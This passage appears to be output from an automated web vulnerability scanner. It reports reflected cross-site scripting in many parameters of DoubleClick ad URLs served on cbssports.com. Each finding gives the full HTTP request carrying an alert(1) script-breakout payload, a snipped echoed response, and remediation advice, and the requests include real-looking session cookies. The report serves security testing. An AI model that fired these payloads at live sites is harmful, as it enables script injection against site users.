This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; v ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d526e"-alert(1)-"a35697c3090 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid= ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4924b"-alert(1)-"e04afa304fa was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... t/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbsspor ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93a5"-alert(1)-"a1432e838ab was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dbe2"-alert(1)-"5a7ce4f1f97 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... leclick.net/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=w ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f2c"-alert(1)-"a9944300532 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... id=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6a1"-alert(1)-"2fce02e725 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tb ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85c1"-alert(1)-"a850f38534d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&even ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c402c"-alert(1)-"b9372fb4719 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4967e"-alert(1)-"61439fec9d1 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b25"-alert(1)-"c1a8f9ea9c2 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 97/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http: ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86d72"-alert(1)-"3044e5f3dbb was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
